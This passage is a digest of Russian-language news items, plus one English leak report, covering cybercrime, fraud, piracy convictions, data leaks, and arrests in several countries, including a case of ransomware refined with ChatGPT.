Поло дали больше срок из-за дополнительных обвинений помимо преступного нарушения авторских прав, которые касались отмывания денег и управления iStreamitall, отдельным нелегальным стриминговым сайтом. Согласно данным суда, в какой-то момент Дэррил Поло разошелся с партнерами из Jetflicks и создал собственный пиратский сервис iStreamItAll (ISIA), в каталоге которого числилось не только почти 116 тыс. эпизодов сериалов, но и более 10 тыс. полнометражных фильмов. ISIA работал по тому же принципу, что и Jetflicks - платная подписка на территории США и Канады. Сервис позиционировался как крупнейший каталог стримингового контента - его было больше, чем на любой из легальный платформ, будь это Netflix, Hulu, Vudu или Amazon Prime. Оба пиратских сервиса работали на различных типах устройств, платформ и ПО, и были совместимы практически со всеми операционными системами (ОС), смартфонами, планшетами, игровыми консолями, цифровыми медиаплеерами, стриминговыми TV- приставками и веб-браузерами.
«Обвиняемые вступили в сговор с целью управления онлайновым потоковым ИТ- сервисом, который незаконно воспроизводил и распространял тысячи телевизионных программ, защищенных авторским правом, ради собственной выгоды. Это дело - еще один пример нашего твердого намерения бороться с кражей интеллектуальной собственности и привлекать к ответственности тех, кто нарушает законы о защите интеллектуальной собственности», - заявил после суда прокурор округа Невада Джейсон Фриерсон (Jason Frierson).
По данным Фриерсон, после того как к Jetflicks стали поступать судебные жалобы и проблемы с поставщиками платежных услуг, операторы попытались скрыть характер ИТ-сервиса, переименовав его в JetFlix, платформу, которая якобы предназначалась для потокового вещания контента. Как выяснилось позже, это не помогло.
Приговор программисту пиратского кинотеатра Jetflicks Йоану Вайланту и еще пяти операторам будет вынесен 3-4 февраля 2025 г.
Другие фигуранты дела
Восемь граждан уже задержаны, причастных к деятельности двух крупных пиратских онлайн-сервисов, нанесших американским киностудиям и телекомпаниям многомиллионный ущерб. Имена обвиняемых - Кристофер Ли Даллман (Christopher Lee Dallman) (36 лет), Дэррил Поло (36 лет, также известен под онлайн- псевдонимом djppimp), Дуглас Курсон (Douglas Courson) (59 лет), Филипп Гарсиа (Philip Garcia) (37 лет), Джаред Эдвардс (Jared Edwards) (38 лет), Питер Юбер (Peter Hubert) (61 год), Йоани Вайлант и Луис Вильярино (40 лет). Они обвиняются в том, что из офиса в Лас-Вегасе оперировали пиратским стриминговым сервисом Jetflicks, предоставляя по платной подписке доступ к стримингу и скачиванию фильмов, сериалов и телешоу без разрешения правообладателей.
Пятеро фигурантов были осуждены в июне 2024 г. Кристофер Даллманн, Дуглас Курсон, Фелипе Гарсия, Джаред Яуреки (Jared Jaureki) и Питер Хубер (Peter Huber) были признаны виновными в преступном нарушении авторских прав. Даллманн же имел более длинный послужной список, включавший три дополнительных пункта обвинения в нарушении авторских прав и два - в отмывании денег путем сокрытия.
Теперь всем обвиняемым, кроме Даллманна, грозит не более пяти лет лишения свободы. В случае с Даллманном возможен гораздо более суровый приговор - до 48 лет лишения свободы из-за дополнительных обвинений в отмывании денег.
По данным Министерства юстиций США, скрипты автоматизации Jetflicks работали безостановочно. Эти скрипты проверяли самые популярные пиратские сайты в интернете, такие как The Pirate Bay, RARBG, altHUB и Nzbplanet, в поисках контента, который можно было бы разместить на Jetflicks для платных подписчиков. Пиратский кинотеатр регулярно находила способы разместить эпизоды телешоу в течение дня после их первого выхода в эфир. Суд установил, что эта операция затрагивала каждого владельца телешоу в США, нанося миллионные убытки индустрии.
Десятки тысяч пользователей платили Jetflicks за подписку. Данное дело считается крупнейшим в истории интернет-пиратства по объему украденного контента. Эксперты полагают, что те, кто был причастен к управлению сайтом, заработали десятки миллионов на подписках.
• Source: https://www.theregister[.]com/2024/11/18/jetflicks_programmer_conviction/
Киберполицейские Прикарпатья разоблачили мошенника, который в сети собирал деньги на лечение умершего ребенка.
Создав в одной из социальных сетей фейковый аккаунт, аферист распространял ложные сообщения о потребности в материальной помощи для спасения тяжелобольного ребенка. Об этом сообщает Киберполиция.
На момент сбора средств ребенок уже умер. Сейчас злоумышленнику сообщено о подозрении.
Правоохранители выяснили, что 36-летний житель Ивано-Франковска в социальной сети распространял ложные сообщения о сборе средств якобы на лечение ребенка. В сообщении указывал собственные банковские реквизиты.
Полицейские установили, что в постах аферист распространял среди пользователей одной из социальных сетей, предварительно полученные им, с интернет-страницы одного из лечебных учреждений, фотографии онкобольного ребенка, который после проведения хирургического вмешательства в 2021 году умер.
Ребенка аферист выдавал за своего сына. Таким образом, злоупотребляя доверием граждан Украины, он завладел средствами граждан.
Сотрудники киберполиции установили место жительства злоумышленника. В ходе проведения обыска в квартире мошенника полицейские изъяли мобильные телефоны, сим-карты, банковские платежные карты, черновые записи и другие вещественные доказательства его преступной деятельности.
Следователи сообщили о подозрении в совершении уголовного преступления, предусмотренного ч. 1 ст. 190 (Завладение чужим имуществом или приобретение права на имущество путем обмана или злоупотребления доверием (мошенничество) УК Украины.
Мошеннику грозит наказание в виде ограничения свободы на срок до трех лет.
source: cyberpolice.gov.ua/news/kiberpoliczejski-prykarpattya-vykryly- shaxraya-yakyj-u-soczmerezhi-zbyrav-groshi-na-likuvannya-pomerloyi-dytyny-1773
Двух алматинцев осудили из-за организацию азартных игр со ставками и денежным вознаграждением в соцсети TikTok
"Ставки в TikTok за азартные онлайн-игры с приемом денег и выдачей выигрыша через банковские переводы осуществляли жители Алматы. В ходе следствия доказано, что граждане в социальных сетях организовали незаконный игорный бизнес в течение четырех месяцев с извлечением дохода в крупном размере на сумму почти 13 миллионов тенге", - сообщили в агентстве.
Подсудимые, двое жителей Алматы, признаны виновными и приговорены к полутора годам ограничения свободы.
Кроме того, в суде рассматривается дело в отношении четырех лиц с аналогичными правонарушениями в сфере незаконного игорного бизнеса с извлечением дохода в особо крупном размере, отметили в агентстве.
В АФМ напомнили, что организация азартных игр в социальных сетях является незаконной и противоречит нормам закона "Об игорном бизнесе".
Инженер-программист Asahi Linux (проект по переносу Linux на устройства Mac) Гектор Мартин (Hector Martin) обнаружил баг в чипах Apple M1, который невозможно исправить без перепроектирования.
К счастью, даже сам эксперт считает эксплуатацию этой ошибки, которой было присвоено название M1RACLES (M1ssing Register Access Controls Leak EL0 State) и идентификатор CVE-2021-30747, маловероятной, а саму уязвимость называет почти несущественной.
Мартин рассказывает, что ошибка позволяет двум приложениям, работающим на одном устройстве, обмениваться данными между собой через секретный канал связи на уровне ЦП, без использования памяти, сокетов, файлов или других обычных функций операционной системы. По мнению исследователя, эта проблема — результат банальной ошибки, связанной с человеческим фактором.
Хотя эта уязвимость интересна тем, что для обнаружения такого аппаратного бага потребовался высокий уровень знаний и опыта, Мартин отмечает, что данный баг никоим образом не может быть полезен для злоумышленников. В FAQ на официальном сайте уязвимости исследователь пишет, что проблему не может использовать малварь для захвата устройства, с ее помощью нельзя похищать данные, и рядовым пользователям беспокоиться не о чем.

Единственный способ эксплуатации бага, по мнению Мартина, — это теневые рекламные компании, которые могут злоупотреблять приложением, которое они заранее установили на устройстве пользователя. В теории, таким образом можно реализовать cross-app слежку, хотя в рекламной индустрии существует множество других более надежных методов сбора данных, и вряд ли M1RACLES заинтересует кого-либо с этой точки зрения.
Мартин пишет, что уведомил Apple о своей находке, однако пока компания не сообщила, планирует ли они исправить баг в будущих версиях чипов M1.
Источник: xakep.ru/2021/05/27/m1racles/
Издание The Record сообщает, что голландская компания RDC, предоставляющая автовладельцам услуги гаражного хранения и технического обслуживания, допустила утечку данных. В итоге на хакерском форуме выставили на продажу данные 7 300 000 автовладельцев и их авто.

Разместивший рекламу злоумышленник утверждает, что для 2 300 000 записей в базе есть адреса электронной почты, что позволит покупателям устраивать фишинговые атаки и рассылать спам.
Представители RDC уже подтвердили факт утечки, и сообщили, что злоумышленники, похоже, получили доступ примерно к 60% записей клиентов компании. Пока данные не были опубликованы в даркнете, в RDC не знали о взломе. В настоящее время ведется расследование случившегося, и помимо правоохранительных органов к расследованию привлекли ИБ-компанию Fox-IT.
В образцах дампа, изученных журналистами, содержались детали, которые позволяют идентифицировать владельцев автомобилей, узнать, где они живут и какие именно авто водят. Так, база содержит имена (и названия компаний), домашние адреса, адреса электронной почты, номера телефонов, даты рождения, а также регистрационные номера транспортных средств, данные о марках и моделях автомобилей.

Голландская телекомпания NOS уже подтвердила подлинность опубликованных данных и сообщила, что весь дамп хакеры оценивают в 35 000 долларов.
ИБ-эксперты предупреждают, что самая большая опасность от этой утечки заключается вовсе не в том, что жертвам теперь будет приходить спам. Проблема в том, что база представляет большую ценность для угонщиков автомобилей, которые могут использовать эти данные, например, для обнаружения дорогих авто на территории страны.
Источник: xakep.ru/2021/03/26/rdc-leak/
Пять человек были приговорены к тюремному заключению за участие в схеме мошенничества с криптовалютой на сумму 21,6 миллиона долларов.
Преступники получили 21,6 миллиона долларов (20 миллионов евро) от примерно 40 000 инвесторов через несколько инвестиционных схем, включая кошелек EXW и криптовалютный токен EXW, сообщило 23 октября австрийское новостное издание Heute.
Двое обвиняемых были приговорены к 5 годам лишения свободы, двое получили 30 месяцев, а еще один получил 18 месяцев тюремного заключения. Пятеро были оправданы, а остальные продолжают скрываться от властей.
Судебный процесс по делу о мошенничестве в окружном суде Клагенфурта стал крупнейшим в истории Австрии, отметил Хойте.
Приговоры были вынесены судьей Клаудией Бандион-Ортнер 23 октября после двух месяцев судебного разбирательства и 300 часов переговоров. Хойте сказал, что мошенники жили так, как будто они были в «голливудском фильме» — тусовались в некоторых из «шикарных» клубов Дубая и путешествовали между городами на частных самолетах.
Они даже купили аквариум с акулами на вилле, которая, как сообщает сайт новостей и обзоров BehindMLM, находится на Бали.
Как сообщает BehindMLM в статье от 12 июля, на секс-работников было потрачено более 100 000 долларов.
«Не было недостатка в деньгах», сказал Хойте.
Мошенническая операция базировалась в Дубае, но часть украденных денег будет перевезена в Австрию (откуда многие из них родом) в пластиковых пакетах, отметил Хойте.
В сентябре 2023 года австрийская прокуратура предъявила обвинения восьми людям, причастным к афере с EXW, а в последующие месяцы обвинения были предъявлены еще нескольким людям.
Отсутствие соглашения об экстрадиции между Австрией и Объединенными Арабскими Эмиратами усложнило задачу прокуроров, сказал Хойте, отметив, что некоторые обвиняемые добровольно сдались, а другие скрылись.
Один из основателей EXW Wallet Бенджамин Херцог признал себя виновным в декабре прошлого года, сообщает BehindMLM.
Некоторые из осужденных по приговору от 23 октября, очевидно, планируют обжаловать свои приговоры.
EXW Wallet был запущен в конце 2019 года и обещает токены EXW ежедневную прибыль от инвестиций от 0,1% до 0,32%. Схема мошенничества рухнула несколько месяцев спустя, в 2020 году.
Мошенники также продвигали проекты в сфере недвижимости, в то время как некоторые из обвиняемых также находятся под следствием по делу о мошенничестве, связанном с каннабисом, где, как утверждается, у 17 000 жертв было украдено 17,2 миллиона долларов (16 миллионов евро).
• Source: <https://www.heute.at/s/haibecken-privatjet-jetzt-sind-schnoesel- urteile-da-120068550>
• Source: <https://behindmlm.com/companies/exw-wallet-verdicts-delayed-to- september-2024/>
• Source: <https://behindmlm.com/companies/benjamin-herzog-pleads-guilty-to- exw-wallet-fraud-charges/>
Сотрудниками ГУ МВД России по Алтайскому краю при участии специалистов компании в сфере информационной безопасности пресечена деятельность межрегиональной группировки, которая специализировалась на хищениях денежных средств граждан.
По оперативным данным, объектом криминального интереса были люди, которые с помощью популярного интернет-сервиса подыскивали автомобильный транспорт для дальних поездок.
«Установлено, что в период с сентября 2021 по май 2022 года участники группы регистрировались на онлайн-сервисе и размещали фиктивные предложения. Отозвавшимся гражданам предлагали забронировать место. Затем сообщники убеждали продолжить общение в мессенджере, где просили произвести онлайн- платеж через фишинговую ссылку, ведущую на сайт-двойник. Переход по ссылке позволял им получить данные банковских карт несостоявшихся пассажиров и списать имеющиеся на счетах денежные средства.
Суммы фигурировали разные – от нескольких сотен до нескольких миллионов рублей. Так, благодаря бдительности и оперативно принятым мерам работников одного из банков была приостановлена операция по счету жителя города Кирова, у которого предприимчивые молодые люди пытались похитить более трех миллионов рублей.
Для осуществления противоправной деятельности, а также с целью конспирации соучастники использовали специальные компьютерные программы, интернет-боты, сервисы подмены номеров абонентов сотовой связи», - сообщила официальный представитель МВД России Ирина Волк.
Мероприятия по их задержанию проведены полицейскими в трех регионах страны – в Тюменской и Челябинской областях, а также Удмуртской Республике.
«В ходе обысков изъяты сотовые телефоны, сим-карты, компьютеры, ноутбуки, банковские карты и другие предметы, имеющие доказательственное значение.
Следователем ГСУ ГУ МВД России по Алтайскому краю возбуждено уголовное дело по признакам преступления, предусмотренного пунктом «г» части третьей статьи 158 УК РФ.
В настоящее время предполагаемый лидер группы находится под домашним арестом. В отношении двоих его сообщников избраны меры пресечения в виде заключения под стражу и подписки о невыезде и надлежащем поведении. Предварительное расследование продолжается», - отметила Ирина Волк.
Обновите свои устройства, чтобы не стать очередной жертвой хакеров.
Apple выпустила экстренные обновления безопасности для устранения двух zero- day уязвимостей в iOS, которые уже были использованы в реальных атаках на iPhone. Об этом компания сообщила пятого марта в отдельной рекомендации по безопасности.
Уязвимости были обнаружены в ядре iOS ( CVE-2024-23225 ) и RTKit ( CVE-2024-23296 ), рейтинг CVSS для них пока не определён. Обе уязвимости позволяют атакующим с произвольными возможностями чтения и записи в ядре обходить защиту памяти ядра.
Apple устранила эти недостатки для устройств, работающих на iOS 17.4, iPadOS 17.4, iOS 16.76 и iPadOS 16.7.6, улучшив проверку вводимых данных. Список затронутых устройств Apple включает в себя iPhone XS и более новые модели, iPhone 8, iPhone 8 Plus, iPhone X, iPad 5-го поколения, iPad Pro 9.7-дюймов и iPad Pro 12.9-дюймов 1-го поколения, а также более поздние версии этих устройств и другие модели iPad и iPad mini.
Хотя Apple не предоставила информацию о конкретных случаях эксплуатации уязвимостей «в дикой природе», такие уязвимости часто используются в шпионском ПО, спонсируемом государством, таком как израильский Pegasus от NSO Group. Подобный софт обычно применяется для атак на журналистов, оппозиционных политиков и диссидентов.
Установить обновления безопасности рекомендуется как можно скорее для предотвращения возможных рисков, даже учитывая вероятность того, что эти уязвимости использовались только в целенаправленных атаках.
В этом году Apple уже устранила 3 уязвимости типа «zero-day», первую из которых закрыла в январе. А в прошлом году компания и вовсе исправила 20 таких уязвимостей.
45-летняя женщина несколько лет промышляла распространением "классического" тяжелого наркотика: с напарником покупала партию и делала закладки. Стражи узнали о делах парочки и поймали подельников. В Лексусе «бизнес-леди» были найдены свертки с белым порошком.
Мужика осудили на 15 лет, а с женщиной вышло сложнее — она оказалась под домашним арестом. Но даже такой расклад ей не понравился. Наркобарон_ка пошла на уловки и скрылась от следствия, надев электронный браслет на кота.
Бегала, естественно, недолго. Сейчас она задержана и содержится в СИЗО.
На прошлой неделе полиция Великобритании арестовала мошенника (имя не раскрывается), который рассылал текстовые сообщения тысячам людей, стремясь узнать их банковские реквизиты. По оценкам следователей, используя SIM-карты на нескольких мобильных устройствах, этот человек отправил около 26 000 текстовых сообщений только в день ареста.
21-летний мошенник снимал комнату в Манчестере и использовал ее в качестве штаб-квартиры для своих фишинговых операций. При этом правоохранители полагают, что задержанный был частью более крупной преступной группы и выполнял «черную работу» для более важных игроков, которые руководят операцией.
Мошенника поймали лишь потому, что сотрудники отеля сочли его подозрительным: он носил в сумке множество кабелей, что показалось им странным.
При обыске полицейские обнаружили оборудование, которое можно было использовать для SMS-фишинга. Сообщается, что на изъятых устройствах хранилось более 44 000 мобильных контактов.
Текстовые сообщения, которые массово рассылал мошенник, были написаны от лица службы доставки посылок Hermes. Фальшивые уведомления гласили, что потенциальная жертва пропустила доставку, и у нее запрашивали банковскую информацию. Большая часть сообщений была отправлена через EE, одного из крупнейших операторов мобильной связи и интернет-провайдеров в Великобритании, насчитывающем более чем 27 000 000 абонентов.
Количество пострадавших от этой мошеннической схемы пока не раскрывается, но речь может идти о тысячах человек.
• Source: gmp.police.uk/news/greater-manchester/news/news/2021/june/man- arrested-in-manchester-hotel-after-over-25000-phishing-messages-sent-in-one- day/
Недавняя атака обнажила уязвимости американской системы киберзащиты.
[Как сообщают зарубежные источники](https://edition.cnn.com/2024/03/08/politics/top-us-cybersecurity- agency-cisa-hacked/index.html), в феврале системы Агентства по кибербезопасности и защите инфраструктуры США (CISA) подверглись атаке хакеров, которые использовали уязвимости в продуктах компании Ivanti.
В ответ на нарушение безопасности агентство было вынуждено отключить две ключевые системы, о чём сообщили представитель CISA и официальные лица США, знакомые с инцидентом.
Взлому подверглась система IP Gateway, предназначенная для обмена инструментами оценки безопасности между федеральными, штатными и местными официальными лицами, а также инструмент оценки химической безопасности (Chemical Security Assessment Tool, CSAT), содержащий информацию о безопасности химических объектов и оценках уязвимости безопасности.
Представитель CISA отметил, что предварительное расследование, проведённое экспертами правительства, показало, что злоумышленники использовали уязвимости в продуктах Ivanti . «Воздействие было ограничено двумя системами, которые мы немедленно отключили. Мы продолжаем обновление и модернизацию наших систем», — заявил представитель.
Весьма иронично, что ранее CISA предупреждало американские организации об атаках, эксплуатирующих уязвимости в программном обеспечении Ivanti. Так, первого февраля агентство приказало федеральным ведомствам отключить все уязвимые экземпляры продуктов Ivanti Connect Secure и Ivanti Policy Secure в течение 48 часов, а 29 февраля вновь предупредило организации об активной эксплуатации.
Раскрывать подробности атаки или указывать на конкретного злоумышленника агентство пока не стало, видимо, сочтя эту информации несущественной, или же, наоборот, высокочувствительной и компрометирующей. Тем не менее, несмотря на атаку, представители CISA утверждают, что какого-либо значимого влияния на их организацию или на системы партнёров — оказано не было.
Этот инцидент служит напоминанием о том, что любая организация может стать жертвой уязвимости. Даже само олицетворение американской кибербезопасности в лице CISA от этого не застраховано.
Уязвимости могут присутствовать в любом программном обеспечении, поэтому крайне важно иметь чёткий план действий на случай ИБ-инцидентов, своевременно обновлять системы и программы, а также проводить регулярную оценку рисков для предотвращения и минимизации последствий возможных атак.
Но недолго.
Как выяснили следователи, похитил у одного из костромских бизнесменов некий таксист — причем сделал это достаточно оригинальным способом: когда он отвозил своего клиента домой, у того не оказалось при себе наличных и гражданин отлучился к себе в квартиру, чтобы взять деньги; при этом он оставил портмоне с банковскими картами на заднем сиденье такси. И пока клиент отсутствовал таксист обратил внимание на то, что в кошельке рядом с картой лежала бумажка, на которой был записан пин-код к ней. Не долго думая таксист вытащил карту (одну из многих) из кошелька и запомнил пин-код.
А после решил пожить на чужие деньги на широкую ногу — и снял с карты в общей сложности 990 тысяч рублей.
Однако сладкая жизнь оказалась недолгой — потерпевший стал получать СМС- уведомления о тратах и обратился в полицию, где похитителя по транзакциям вычислили очень быстро. Теперь в отношении чересчур находчивого 36-летнего таксиста возбуждено уголовное дело по статье «Хищение средств с банковского счета». До 6 лет лишения свободы, между прочим.
Сотрудники криминальной полиции Главного управления Нацполиции в Закарпатской области, совместно со следователями Отдела полиции № 1 Ужгородского районного управления полиции, прекратили работу дежурного мошеннического call-центра.
В ходе оперативной работы полицейские выяснили, что офис мошеннической организации злоумышленники обустроили в городе Чоп Ужгородского района. К организации причастны четверо мужчин из Кривого Рога, которые привлекли к схеме более 30 операторов. Последние непосредственно совершали звонки потенциальным жертвам и выманивали у них денежные средства.
Работали по следующей схеме: представлялись сотрудниками банка и сообщали, что с карты лица произошло снятие средств. Для обеспечения безопасности их финансового счета предлагали помощь и выманивали конфиденциальную информацию. В дальнейшем - обнуляли онлайн-кошельки пострадавших.
Правоохранители провели обыски по месту функционирования мошеннического колл- центра и изъяли с места происшествия всю технику злоумышленников. По факту несанкционированного вмешательства в работу информационных (автоматизированных), электронных коммуникационных, информационно- коммуникационных систем, электронных коммуникационных сетей, совершенных по предварительному сговору группой лиц, следователи открыли уголовное производство по ч.2 ст. 361 Уголовного кодекса Украины. За содеянное организаторам грозит до пяти лет лишения свободы.
Сейчас правоохранители устанавливают лиц, пострадавших от действий мошенников и предполагаемых сообщников фигурантов. По делу продолжается следствие.
Анонимный пользователь отправил 10 BTC мошенникам, которые с фейкового аккаунта Илона Маска в Twitter пообещали удвоить отправленную сумму. Об этом сообщает BBC.
Собеседник издания перешел по ссылке злоумышленников в комментариях к публикации настоящего главы Tesla. На мошенническом сайте ему предложили удвоить сумму от 0,1 BTC до 20 BTC.
Убедившись, что ссылка размещена с верифицированного аккаунта, инвестор начал думать над суммой транзакции: 5 BTC или 10 BTC.
«Возьми по максимуму, подумал я, это же явно правда. Так что я отправил 10 BTC», — отметил аноним.
Сайт обещал, что средства поступят в течение 20 минут — время отсчитывал специальный таймер.
Пользователь дважды в минуту обновлял свой кошелек в ожидании удвоенной суммы, но так и не получил биткоины.
«Я понял, что это все большой обман. […] Я подумал, что только что выбросил критически значимую сумму для моей семьи, деньги для раннего выхода на пенсию и на все будущие праздники моих детей. Я пошел наверх и сел на край кровати рассказать жене. Я разбудил ее и сказал, что совершил большую ошибку, действительно большую ошибку», — добавил он.
Пострадавший от мошенничества несколько часов писал на электронную почту сайта и фейковому Илону Маску в Twitter в надежде вернуть хотя бы часть утраченного.
По данным аналитического сервиса Whale Alert, 2021 год стал рекордным по сумме убытков от фейковых раздач криптовалюты. За неполные три месяца мошенники украли $18 млн против $16 млн за весь 2020 год.
Discovery of the leak
CloudSEK’s proprietary risk monitoring tool XVigil discovered a post on a popular surface web forum on 29 January 2021. The actor claims to have 500,000 records and has shared a sample of the leak that contains the data of 10,000 users. For more records, the threat actor has to be reached via email or Telegram.
Contents of the leak
The sample CSV file, shared over a file hosting link, contains 10,452 records. Each record includes the following fields:
Data verification and validation
On analysing the sample, CloudSEK researchers identified that the common denominators of a significant amount of the sample data are Bihar (“wedistrict”) and 22 December 2019 (“wedate”). This points to the candidates of the preliminary examination conducted by Bihar Police Subordinate Services Commission (BPSSC) for the post of Sub Inspector/ Sergeant/ Assistant Superintendent Jail / Assistant Superintendent Jail, on 22 December 2019.

The mobile numbers provided in the sample have been validated against the
candidate’s name.
Impact
The entire leaked database consists of ~500K records. Since the database includes sensitive data, i.e. name, mobile number, and PII, it makes the victims vulnerable to phishing campaigns, scams, and even identity theft.
В Мьянме [задержали](https://www.rfa.org/english/myanmar/2024/12/03/myanmar- chinese-scams/) 45 человек по подозрению в участии в крупной схеме онлайн- мошенничества в штате Шан. В ходе рейда полиция изъяла оборудование Starlink, мобильные телефоны и оружие. Какие меры будут применены к задержанным, пока не уточняется. Среди задержанных также 18 граждан Китая.
Жители Тангьяна, где проводились правоохранительные действия, говорят, что банды мошенников продолжают работать, несмотря на аресты и рейды спецслужб. Преступники часто перемещаются с места на место, чтобы избежать столкновения с полицией. После серии задержаний в конце 2023 года многие из группировок перебрались в Тангьян из района Пангсан. Местные жители отмечают, что мошенники ведут себя заметно: ездят на дорогих автомобилях и возводят высокие заборы вокруг своих домов, где живут и работают одновременно.
Преступные операции также активно ведутся в городке Мусе на границе с Китаем, который находится под контролем хунты. По словам очевидцев, некоторые группы сотрудничают с местными властями, получая от них защиту.
С 2023 года Китай усилил борьбу с мошенническими схемами, сотрудничая с Таиландом, Лаосом и Мьянмой. За это время было задержано более 53 000 граждан Китая, подозреваемых в таких преступлениях. В ноябре глава военного правительства Мьянмы посетил Китай, где обсуждал борьбу с трансграничными преступлениями. Однако местные жители считают, что большинство арестов проводится только для вида, чтобы успокоить Пекин.
На фоне арестов стало известно о девушке из Лаоса, которая уже 2 года находится в плену у мошенников в штате Карен. Её заставляют работать по 10-19 часов в день, а неудачные попытки мошенничества караются пытками. Семья пленницы обратилась за помощью, но вернуть девушку из районов, неподконтрольных властям Мьянмы, оказалось практически невозможно. По данным правозащитников, десятки граждан Лаоса всё ещё работают на мошеннические банды в Мьянме, находясь под жестким контролем.
С началом пандемии COVID-19 и усилением контроля на границе между Китаем и Мьянмой этнические группы начали осваивать цифровую нелегальную экономику, перейдя с продажи запрещенных веществ. Онлайн-мошенничество, включающее инвестиционные аферы и финансовое вымогательство, стало новым источником дохода. Операции часто связаны с казино, где жертвы торговли людьми работают в условиях, близких к рабству.
В феврале стало известно, что недавно построенная «фабрика мошенничества» KK Park на границе Мьянмы и Таиланда заработала почти $100 млн за менее чем 2 года. Сотрудники фабрики вынуждены заниматься мошенничеством типа The Pig Butchering Scam – афера, при которой мошенник в ходе онлайн-переписки входит в доверие жертвы, а затем обманным путем убеждает её совершать фиктивные инвестиции.
Напомним, что с лета 2023 года Китай настойчиво требовал от властей Мьянмы принять жесткие меры против многочисленных анклавов кибермошенников, действующих в приграничных районах. Поводом стала волна махинаций с использованием схемы «забоя свиней» (pig butchering), жертвами которых становились граждане КНР. Деятельность преступных анклавов в приграничных районах Мьянмы опиралась на использование принудительного труда людей, незаконно завезенных туда из соседних стран.
Также отметим, что Коалиция повстанческих группировок в Мьянме недавно успешно взяла под контроль город Лауккай, известный как крупный центр кибермошенничества в данном регионе, от которого страдали страны, в том числе граничащие с Мьянмой. Коалиция повстанцев чётко обозначила свою цель — искоренение организованных мошеннических операций, распространявшихся под чутким присмотром местных правоохранителей, верных правящей хунте.
Как раздутый криптотокен HYDRO стал главной проблемой горе-мошенников.
image
По сообщениям Министерства юстиции США (DoJ), главный инженер финтех-платформы
Hydrogen Technology Шейн Хэмптон был признан виновным федеральным судом Южного
округа Флориды в манипулировании ценой на криптовалюту компании HYDRO и
мошенничестве в отношении инвесторов.
По информации обвинения, Хэмптон в течение нескольких месяцев в сговоре с другими лицами преднамеренно завышал курс HYDRO на одной из криптобирж США, чтобы продать собственные запасы валюты по более выгодной цене. Для реализации мошеннической схемы Хэмптон с подельниками нанял компанию из ЮАР, которая с октября 2018 по апрель 2019 года осуществляла фиктивные сделки при помощи торговых ботов.
Приговор Хэмптону должен быть вынесен 29 апреля. Ему грозит максимальное
наказание в виде 5 лет тюремного заключения за сговор с целью совершения
мошенничества с ценами на ценные бумаги и 20 лет тюремного заключения за
сговор с целью совершения мошенничества с использованием электронных средств.
Помимо Хэмптона, вину также признали гендиректор Hydrogen Technology Майкл
Кейн, ожидающий вынесения приговора, и ещё один инженер компании Эндрю
Чорлиан. Кроме того, основатель фирмы Moonwalkers Trading Тайлер Остерн,
признанный соучастником махинаций, уже приговорён к 2 годам тюрьмы.
Злоумышленники провели сотни поддельных сделок на общую сумму свыше $300 млн, создав видимость ажиотажного спроса на HYDRO. Также ими было осуществлено как минимум $7 млн фиктивных операций купли-продажи криптовалюты, не предполагавших перехода прав собственности.
Благодаря этим манипуляциям сообщники Хэмптона смогли в течение 7 месяцев продать собственные запасы HYDRO на $1,5 млн, воспользовавшись завышенным курсом.
Hydrogen Technology позиционирует себя как Hi-Tech компания, предоставляющая платформу для запуска финансовых приложений. Однако эксперты не исключают, что основным источником дохода фирмы были именно махинации с криптовалютой.
Преступления с цифровыми активами в последние годы приобрели массовый характер. В частности, в ноябре 2022 года виновным по 7 уголовным статьям, включая мошенничество в особо крупном размере за счёт средств клиентов, был признан основатель крупнейшей криптобиржи FTX Сэм Бэнкман-Фрид. Его дело вызвало широкий общественный резонанс.
А в сентябре прошлого года основатель масштабной финансовой пирамиды в сфере криптовалют AirBit Club Пабло Родригез был приговорён к 12 годам тюрьмы. Его компания привлекла от доверчивых инвесторов около $100 млн.
Таким образом, прецеденты привлечения к ответственности за нелегальные операции с криптовалютами имеют место, однако масштабы проблемы по-прежнему велики. По словам американских чиновников, количество жалоб инвесторов, пострадавших от мошенничества в сфере криптоактивов, в 2022 году выросло почти вдвое. Это диктует необходимость выработки более строгого законодательства для регулирования данной сферы.
sc: justice[.]gov/opa/pr/man-convicted-300m-securities-price-manipulation-and- wire-fraud-cryptocurrency-conspiracy
Четыре киберпреступника в Китае были арестованы за разработку программ- вымогателей с помощью ChatGPT и их применение, что стало первым подобным случаем в стране. И это при том, что популярный чат-бот от OpenAI официально не доступен в Китае, да и Пекин ужесточает меры в отношении иностранного ИИ.
Согласно сообщению государственного информагентства Синьхуа, об атаке первой сообщила малоизвестная компания из Ханчжоу, системы которой были заблокированы вымогательским ПО. Хакеры потребовали 20 000 стэйблкоинов Tether, что эквивалентно 20 тыс. долларов, за восстановление доступа. Вероятно, это был не единственный подобный случай.
В конце ноября полиция арестовала двух подозреваемых в Пекине и ещё двух во Внутренней Монголии. Они признались, что «писали версии программ-вымогателей, оптимизировали программу с помощью ChatGPT, проводили сканирование уязвимостей, получали доступ путём проникновения, внедряли программы- вымогатели и занимались вымогательством», — говорится в сообщении. В отчёте не говорится, было ли использование ChatGPT частью обвинений. В Китае он находится в серой правовой зоне, поскольку Пекин стремится ограничить доступ к иностранным продуктам генеративного искусственного интеллекта.
После того как в конце 2022 года OpenAI представила своего чат-бота, вызвав «гонку вооружений» в этой области среди технологических гигантов, ChatGPT и подобные продукты заинтересовали китайских пользователей. Вместе с тем OpenAI заблокировала работу чат-бота в Китае, Гонконге и ряде других стран, таких как Россия, Северная Корея и Иран. Однако с помощью виртуальных частных сетей и телефонного номера из поддерживаемого региона можно обойти блокировку.
Судебные дела, связанные с генеративным ИИ, участились, учитывая популярность технологии. В том числе и в Китае. В феврале полиция Пекина предупредила, что ChatGPT может «совершать преступления и распространять слухи». В мае полиция северо-западной провинции Ганьсу задержала человека, который якобы использовал ChatGPT для создания фальшивой новости о крушении поезда и распространил её в интернете, получив более 15 000 переходов по ссылке с новостью. В августе полиция Гонконга арестовала шесть человек в рамках борьбы с мошенническим синдикатом, который использовал дипфейк для создания поддельных изображений идентификационных документов, используемых для мошенничества с кредитами, направленного на банки и кредиторов.
source: msn.com/en-us/money/other/china-makes-first-arrests-in-chatgpt-aided- ransomware-attack/ar-AA1mbSeV
Провернуть всё удалось без шума и пыли, а когда факт атаки заметили, было уже слишком поздно.
В индийском городе Тхана произошло крупное киберпреступление. Неизвестные хакеры получили доступ к одному из эскроу-счетов национального банка, на котором хранились деньги местной строительных компаний, и похитили оттуда около 250 миллионов индийских рупий (примерно 275 миллионов рублей).
Эскроу-счёт открывается у третьей стороны, в данном случае — в банке, для временного хранения денег до завершения сделки между двумя сторонами.
